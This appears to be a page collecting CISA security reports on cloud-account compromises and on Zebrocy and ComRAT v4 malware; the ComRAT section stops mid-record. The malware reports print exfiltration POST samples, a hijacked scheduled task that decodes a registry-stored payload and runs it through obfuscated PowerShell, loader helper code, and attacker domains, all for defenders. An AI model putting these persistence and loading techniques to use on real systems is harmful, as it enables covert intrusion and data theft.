Posts TaggedThreat Research

Original release date: January 13, 2021

Summary

This Analysis Report uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of several recent successful cyberattacks against various organizations’ cloud services. Threat actors are using phishing and other vectors to exploit poor cyber hygiene practices within a victims’ cloud services configuration. The information in this report is derived exclusively from several CISA incident response engagements and provides the tactics, techniques, and procedures; indicators of compromise (IOCs) that CISA observed as part of these engagements; and recommended mitigations for organization to strengthen their cloud environment configuration to protect against, detect, and respond to potential attacks.

For a downloadable copy of IOCs, see AR21-013A.stix.

Note: the activity and information in this Analysis Report is not explicitly tied to any one threat actor or known to be specifically associated with the advanced persistent threat actor attributed with the compromise of SolarWinds Orion Platform software and other recent activity.

Description

Background

These types of attacks frequently occurred when victim organizations’ employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services. Despite the use of security tools, affected organizations typically had weak cyber hygiene practices that allowed threat actors to conduct successful attacks.

Technical Details

The cyber threat actors involved in these attacks used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a “pass-the-cookie” attack—to attempt to exploit weaknesses in the victim organizations’ cloud security practices.

Phishing

CISA observed cyber threat actors using phishing emails with malicious links to harvest credentials for users’ cloud service accounts (Phishing: Spearphishing Link [T1566.002]). The cyber actors designed emails that included a link to what appeared to be a secure message and also emails that looked like a legitimate file hosting service account login. After a targeted recipient provided their credentials, the threat actors then used the stolen credentials to gain Initial Access [TA0001] to the user’s cloud service account (Valid Accounts [T1078]). CISA observed the actors’ logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location). The actors then sent emails from the user’s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization’s file hosting service.

In one case, an organization did not require a virtual private network (VPN) for accessing the corporate network. Although their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it—leaving the organization’s network vulnerable. The threat actor attempted to exploit this by launching brute force login attempts (Brute Force [T1110]).

Forwarding Rules

In several engagements, CISA observed threat actors collecting sensitive information by taking advantage of email forwarding rules, which users had set up to forward work emails to their personal email accounts (Email Collection: Email Forwarding Rule [T1114.003]).

Modified Forwarding

In one case, CISA determined that the threat actors modified an existing email rule on a user’s account—originally set by the user to forward emails sent from a certain sender to a personal account—to redirect the emails to an account controlled by the actors. The threat actors updated the rule to forward all email to the threat actors’ accounts.

Keyword Search Rule

Threat actors also modified existing rules to search users’ email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors’ account.

New Rule Creation and Forwarding

In addition to modifying existing user email rules, the threat actors created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ Really Simple Syndication (RSS) Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.

Authentication

CISA verified that the threat actors successfully signed into one user’s account with proper multi-factor authentication (MFA). In this case, CISA believes the threat actors may have used browser cookies to defeat MFA with a “pass-the-cookie” attack (Use Alternate Authentication Material: Web Session Cookie [T1550.004]).

The threat actors attempted brute force logins (Brute Force [T1110]) on some accounts. However, this activity was not successful. This thwarted attempt was due, in part, to the threat actors not guessing a correct username/password combination, as well as the organization’s use of MFA to access their cloud environment.

Solution

CISA recommends the following steps for organizations to strengthen their cloud security practices.

  • Implement conditional access (CA) policies based upon your organization’s needs.
  • Establish a baseline for normal network activity within your environment.
  • Routinely review both Active Directory sign-in logs and unified audit logs for anomalous activity.
  • Enforce MFA.
  • Routinely review user-created email forwarding rules and alerts, or restrict forwarding.
  • Have a mitigation plan or procedures in place; understand when, how, and why to reset passwords and to revoke session tokens.
  • Follow recommend guidance on securing privileged access.
  • Consider a policy that does not allow employees to use personal devices for work. At a minimum, use a trusted mobile device management solution.
  • Resolve client site requests internal to your network.
  • Consider restricting users from forwarding emails to accounts outside of your domain.
  • Allow users to consent only to app integrations that have been pre-approved by an administrator.
  • Audit email rules with enforceable alerts via the Security and Compliance Center or other tools that use the Graph API to warn administrators to abnormal activity.
  • Implement MFA for all users, without exception.
  • Conditional access should be understood and implemented with a zero-trust mindset.
  • Ensure user access logging is enabled. Forward logs to a security information and event management appliance for aggregation and monitoring so as to not lose visibility on logs outside of logging periods.
  • Use a CA policy to block legacy authentication protocols.
  • Verify that all cloud-based virtual machine instances with a public IP do not have open Remote Desktop Protocol (RDP) ports. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.
  • Focus on awareness and training. Make employees aware of the threats—such as phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.
  • Establish blame-free employee reporting and ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.
  • Ensure existing built-in filtering and detection products (e.g., those for spam, phishing, malware, and safe attachments and links are enabled.
  • Organizations using M365 should also consider the following steps.
    • Assign a few (one to three) trusted users as electronic discovery (or eDiscovery) managers to conduct forensic content searches across the entire M365 environment (Mailboxes, Teams, SharePoint, and OneDrive) for evidence of malicious activity.
    • Disable PowerShell remoting to Exchange Online for regular M365 users. Disabling for non-administrative users will lower the likelihood of a compromised user account being used to programmatically access tenant configurations for reconnaissance.
    • Do not allow an unlimited amount of unsuccessful login attempts. To configure these settings, see password smart lockout configuration and sign-in activity reports.
    • Consider using a tool such as Sparrow or Hawk—open-source PowerShell-based tools used to gather information related to M365—to investigate and audit intrusions and potential breaches.[1][2]

Resources

References

Revisions

  • January 13, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: October 29, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is designed to allow a remote operator to perform various functions on the compromised system.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10310246-1.v1.

Submitted Files (2)

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Tags

backdoor

Details
Name smqft_exe
Size 4307968 bytes
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 ba9c59783b52b93aa6dfd4cfffc16f2b
SHA1 ee6753448c3960e8f7ba325a2c00009c31615fd2
SHA256 0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1
SHA512 bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f4772affd0c55dee1c
ssdeep 49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ
Entropy 6.196940
Antivirus
BitDefender Gen:Variant.Babar.17722
Emsisoft Gen:Variant.Babar.17722 (B)
Lavasoft Gen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 1969-12-31 19:00:00-05:00
Import Hash 20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5 Name Raw Size Entropy
b6114d2ef9c71d56d934ad743f66d209 header 1024 2.184050
0ead1c8fd485e916e3564c37083fb754 .text 1952256 6.048645
a5a4f98bad8aefba03b1fd8efa3e8668 .data 196096 5.841971
96bfb1a9a7e45816c45b7d7c1bf3c578 .rdata 2153984 5.690400
916cd27c0226ce956ed74ddf600a3a94 .eh_fram 1024 4.244370
d41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000
1f825370fd049566e1e933455eb0cd06 .idata 2560 4.462264
486c39eb96458f6f5bdb80d71bb0f828 .CRT 512 0.118370
aa692f6a7441edad64447679b7d321e8 .tls 512 0.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an Exclusive OR (XOR) and hexadecimal encoded Uniform Resource Identifier (URI) or it can run using a plaintext URI.

Displayed below is a sample plaintext argument used by the malware:

–Begin arguments–
Domain: malware.exe <Domain>
or
IP: malware.exe <IP address:Port>
–End arguments–

When executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB) algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%RoamingPersonalizationEUDCPolicies3030304332393839394630353537343934453244.”

It also collects information about the victim’s system such as username, 6 bytes of current user’s Security Identifiers (SID), and time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:

–Begin POST requests–

–Begin POST request sample–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228–
–End POST request sample–

–Begin POST request sample–
POST / HTTP/1.1
Host: <IP address>:<Port>
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Accept-Encoding: gzip

–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108–
–End POST request sample–

–End POST requests–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create scheduled task for persistence
–End functions–

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details
Name sespmw_exe
Size 4313600 bytes
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 e8596fd7a15ecc86abbbfdea17a9e73a
SHA1 be07f6a2c9d36a7e9c4d48f21e13e912e6271d83
SHA256 2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8
SHA512 4a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb790e44a52fabe02a
ssdeep 49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u
Entropy 6.197768
Antivirus
BitDefender Gen:Variant.Babar.17722
Emsisoft Gen:Variant.Babar.17722 (B)
Lavasoft Gen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 1970-01-04 14:01:20-05:00
Import Hash 20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5 Name Raw Size Entropy
2ebbe6c38d9e8d4da2449cc05f78054a header 1024 2.198390
a7c0885448e7013e05bf5ff61b673949 .text 1954816 6.046127
9bf966747acfa91eea3d6a1ef17cc30f .data 196096 5.843286
31182660fce8ae07d0350ebe456b9179 .rdata 2157056 5.696834
9eeb1eeb42e99c54c6429f9122285336 .eh_fram 1024 4.292769
d41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000
0bc884e39b3ba72fb113d63988590b5c .idata 2560 4.424718
9bbfafc74bc296cd99dc8307ffe120ac .CRT 512 0.114463
2b60c482048e4a03fbb82db9c3416db5 .tls 512 0.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an XOR and hexadecimal encoded URI. The file cannot run using a plaintext URI as compared to the other Zebrocy backdoor binary “ba9c59783b52b93aa6dfd4cfffc16f2b”. This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.

When executed, it will encrypt the URI using AES-128 ECB algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%RoamingUserDataMultimediaPolicies3030304332393839394630353537343934453244”.

It also collects information about the victim’s system such as username, 6 bytes of current user’s SID, and time of infection. The data is encrypted and hexadecimal encoded before exfiltrated using the predefined URI.

–Begin POST request–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Accept-Encoding: gzip

–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db–
–End POST request–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create schedule a task for persistence manually
More
–End functions–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • October 29, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: October 29, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware variant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA, CNMF, and FBI are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

FBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.

This report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link library (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs used as communication modules. The communication module (32-bit or 64-bit DLL) is injected into the victim systemís default browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The named pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and exfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which includes the configuration and logs files.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https://us-cert.cisa.gov/

For a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix.

Submitted Files (5)

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll)

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1)

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll)

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe)

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1)

Domains (6)

branter.tk

bronerg.tk

crusider.tk

duke6.tk

sanitar.ml

wekanda.tk

Findings

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

Tags

dropper

Details
Name corrected.ps1
Size 4345430 bytes
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, LF line terminators
MD5 65419948186842f8f3ef07cafb71f59a
SHA1 93537b0814177e2101663306aa17332b9303e08a
SHA256 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
SHA512 83d093c6febacb11fcde57fee98c2385f628e5cd3629bfabd0f9e4d2c5de18c6336b3d3aff8081b06a827e742876d19ae370e81890c247daac73d4f8b7ea5f90
ssdeep 24576:+vq2EYNg0gX792UHDoSe9Ov2a8p+JnHZUoWYWUpcfm3WuPhu/aqJOFKs4Wuw054o:Drr9q0v4ubJmg4OFuwkOM5NZihxs
Entropy 4.004402
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
1349191514… Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
Description

This file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into a registry on the victim system. This malicious script also modifies the following scheduled task on the victim’s system:

—Begin Modified Scheduled Task—
C:WindowsSystem32TasksMicrosoftWindowsCustomer Experience Improvement ProgramConsolidator
—End Modified Scheduled Task—

The modification of this scheduled task causes the installed malicious PowerShell script to be executed. Displayed below is the original scheduled task:

—Begin Original Scheduled Task—
<?xml version=”1.0″ encoding=”UTF-16″?>
<Task xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
<RegistrationInfo>
   <Version>1.0</Version>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
   <Source>$(@%systemRoot%system32wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%system32wsqmcons.exe,-108)</Author>
   <Description>$(@%systemRoot%system32wsqmcons.exe,-107)</Description>
   <URI>MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator</URI>
</RegistrationInfo>
<Principals>
   <Principal id=”WinSQMAccount”>
    <UserId>S-1-5-18</UserId>
   </Principal>
</Principals>
<Settings>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <StartWhenAvailable>true</StartWhenAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
   <TimeTrigger>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Repetition>
       <Interval>PT6H</Interval>
    </Repetition>
   </TimeTrigger>
</Triggers>
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>%SystemRoot%System32wsqmcons.exe</Command>
   </Exec>
</Actions>
</Task>
—End Original Scheduled Task—

The scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task:

—Begin Modified Scheduled Task—
<?xml version=”1.0″ encoding=”UTF-16″?>
<Task version=”1.3″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
<RegistrationInfo>
   <Source>$(@%systemRoot%system32wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%system32wsqmcons.exe,-108)</Author>
   <Version>1.0</Version>
   <Description>$(@%systemRoot%system32wsqmcons.exe,-107)</Description>
   <URI>MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator</URI>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
   <TimeTrigger>
    <Repetition>
       <Interval>PT6H</Interval>
       <StopAtDurationEnd>false</StopAtDurationEnd>
    </Repetition>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Enabled>true</Enabled>
   </TimeTrigger>
   <LogonTrigger>
    <Enabled>true</Enabled>
   </LogonTrigger>
</Triggers>
<Principals>
   <Principal id=”WinSQMAccount”>
    <RunLevel>LeastPrivilege</RunLevel>
    <UserId>SYSTEM</UserId>
   </Principal>
</Principals>
<Settings>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <AllowHardTerminate>true</AllowHardTerminate>
   <StartWhenAvailable>true</StartWhenAvailable>
   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <AllowStartOnDemand>true</AllowStartOnDemand>
   <Enabled>true</Enabled>
   <Hidden>false</Hidden>
   <RunOnlyIfIdle>false</RunOnlyIfIdle>
   <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
   <WakeToRun>false</WakeToRun>
   <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
   <Priority>7</Priority>
</Settings>
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c “%SystemRoot%System32wsqmcons.exe &amp; PowerShell.exe -v 2 “$GS459ea = ‘KVYYOBBA4331110uhyicnoor’;
[Text.Encoding]::ASCII.GetString([Convert]::”Fr`omBa`se6`4Str`ing”((gp HKLM:SOFTWAREMicrosoftSQMClientWindows).WSqmCons))|iex;
“”</Arguments>
   </Exec>
</Actions>
</Task>
—End Modified Scheduled Task—

   The modification of the scheduled task illustrated below indicates the primary purpose of this task modification is to decode and execute a PowerShell script contained within the registry key HKLM:SOFTWAREMicrosoftSQMClientWindows = WSqmCons:

—Begin Specific Scheduled Task Module—
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c “%SystemRoot%System32wsqmcons.exe &amp; PowerShell.exe -v 2 “$GS459ea = ‘KVYYOBBA4331110uhyicnoor’;
[Text.Encoding]::ASCII.GetString([Convert]::”Fr`omBa`se6`4Str`ing”((gp HKLM:SOFTWAREMicrosoftSQMClientWindows).WSqmCons))|iex;
“”</Arguments>
—End Specific Scheduled Task Module—

This malicious script installs a PowerShell script (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WsqmCons” registry key. The primary purpose of the newly installed PowerShell is to decode and load a malicious DLL, identified as ComRat v4 (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) onto the victim’s system.

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

Tags

trojan

Details
Name Decode_PowerShell.ps1
Size 1264496 bytes
Type ASCII text, with very long lines, with CRLF, LF line terminators
MD5 0fd79f4c60593f6aae69ff22086c3bb0
SHA1 07f0692c856703d75a9946a0fbb3c0db03f7ac40
SHA256 a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
SHA512 28a0ae0a779aa88499f70cf97ef9db9482527017ea76ee2e469e4184684c4d4fb0559e50f1721e7e9d02655bee4cdf7b12c62a3d037ea10130121cfbb772e250
ssdeep 24576:jarQlVyeHtWdf7PyJjwLKWp57+7fb0TLaB7VrE:jD567vs1tm
Entropy 6.091278
Antivirus
Antiy GrayWare/PowerShell.Mimikatz.a
ClamAV Win.Trojan.PSempireInj-7013548-0
Microsoft Security Essentials Trojan:PowerShell/Powersploit.J
NANOAV Trojan.Script.ExpKit.eydujq
Symantec Hacktool.Mimikatz
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
a3170c32c0… Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
a3170c32c0… Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
Description

This heavily encoded PowerShell script is installed by the malicious script “corrected.ps1” (134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an embedded DLL which has been identified as a variant of the malware known as ComRat v4 “ComRATv4.exe (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316).

Removal of some of the PowerShell obfuscation reveals the functions illustrated below. These functions are used to decompress the embedded DLL, before it is loaded on the target system:

—Begin PowerShell Helper Functions—
   using System;
   using System.IO;
   using System.IO.Compression;

   public static class CD475bjf{
       public static void DBQ800fc(Stream input, Stream output){byte[] buffer = new byte[16 * 1024];
       int bytesRead;
       while((bytesRead = input.Read(buffer, 0, buffer.Length)) > 0){
           output.Write(buffer, 0, bytesRead);
       }}}
   
   public static class MAE38aee{
   
       public static byte[] JZ653jdh(byte[] arrayToCompress){
           using (MemoryStream outStream = new MemoryStream()){using (GZipStream tinyStream = new GZipStream(outStream, CompressionMode.Compress))using (MemoryStream mStream = new MemoryStream(arrayToCompress))CD475bjf.DBQ800fc(mStream, tinyStream);
       return outStream.ToArray();
   }}
   
       public static byte[] PGN255ij(byte[] arrayToDecompress){        
           using (MemoryStream inStream = new MemoryStream(arrayToDecompress))using (GZipStream bigStream = new GZipStream(inStream, CompressionMode.Decompress))using (MemoryStream bigStreamOut = new MemoryStream()){CD475bjf.DBQ800fc(bigStream, bigStreamOut);
       return bigStreamOut.ToArray();
   }}}

#decode base64 above
$decompress = [Convert]::FromBase64String($decompressbase64);

#create another text object for use later
$NS70gea = New-Object System.Text.ASCIIEncoding;

#convert base64 decoded value to string
$decompress = $NS70gea.GetString($decompress,0,$decompress.Length);
—End PowerShell Helper Functions—

Figure 1 illustrates a part of the payload embedded within this malicious script. The encoded PowerShell script contains an embedded function named “Run”, that can load a DLL directly from memory and inject it into a remote process (Figure 2). The PowerShell script injects the embedded ComRAT DLL (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process.

Screenshots

Figure 1 - Screenshot of the payload embedded within this malicious script.

Figure 1 – Screenshot of the payload embedded within this malicious script.

Figure 2 - Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.

Figure 2 – Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

Tags

trojan

Details
Name ComRATv4.exe
Size 1827840 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 faaafa3e115033ba5115ed6a6ba59ba9
SHA1 ca16a95cd38707bad2dc524bb3086b3c0cb3e372
